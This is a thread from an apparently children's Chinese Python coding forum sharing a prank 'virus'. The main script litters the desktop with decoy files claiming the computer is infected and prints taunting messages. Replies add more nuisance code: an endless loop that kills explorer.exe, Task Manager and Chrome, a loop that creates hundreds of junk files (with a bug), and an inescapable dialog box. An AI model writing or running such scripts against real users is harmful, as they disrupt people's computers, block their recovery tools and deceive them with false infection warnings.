猫史档案馆


【Python作品分享】此电脑(病毒)(喵产品)【作品秀】

用户:耗子Haozi耗子Haozi查看:19 回复:10 评论:19 创建时间:2020-04-05T13:11:32


【作品展示】

center_image

 

【作品介绍】

喵py产品一个

 

【作品源代码】

import turtle


file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.txt','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.exe','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.doc','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.docx','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.ppt','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.pptx','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.sb2','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.sb3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.fla','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.gif','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.jpg','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.uga','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.html','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.htm','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.swf','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.ico','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.py','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.zip','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.7z','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.pdf','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.xls','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP4','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP3','w')
file.write('你的电脑已中毒')
file = open('C:/Users/Administrator/Desktop/你的电脑已中毒.MP4','w')
file.write('你的电脑已中毒')

for __count in range(999):
    print('你是喵')
    print('这也能上当')
    print('呵呵呵')
    print('慢慢删吧')

 

【提示】

部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:

https://python.codemao.cn


回复

上一页1 页 / 共 1下一页
dounsm36dounsm36

加载海龟库干嘛

 

点赞0


评论


dounsm36dounsm36

(万一用户不是叫

Administrator

呢?)

点赞0


评论


蒟蒻OIer1048576蒟蒻OIer1048576

for i in range(666):
    with open('D:\你的电脑已死机'+str(i)+'次','w') as file:
        f.write('你的电脑已死机')

点赞0


评论


1BB0090940B96FFBF1BB0090940B96FFBF

优 秀

点赞0


评论


1BB0090940B96FFBF1BB0090940B96FFBF

from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

center_image

点赞1


评论


KLSAKKLSAK

优秀

点赞0


评论


猫悟淡猫悟淡

会报错

点赞0


评论


猫悟淡猫悟淡

center_image

点赞0


评论


8x8x

import turtle

__Pen = turtle.Pen()


__Pen.write('哼,你这个......谁?', font = ('Arial', 36, 'normal'))
__Pen.backward(120)
__Pen.left(90)
__Pen.forward(100)
__Pen.circle(30, steps=5)
turtle.done()

点赞0


评论


無一郎無一郎

from easygui import *

while True:

    easygui.ynbox("你能关掉算我输")

 

点赞0


评论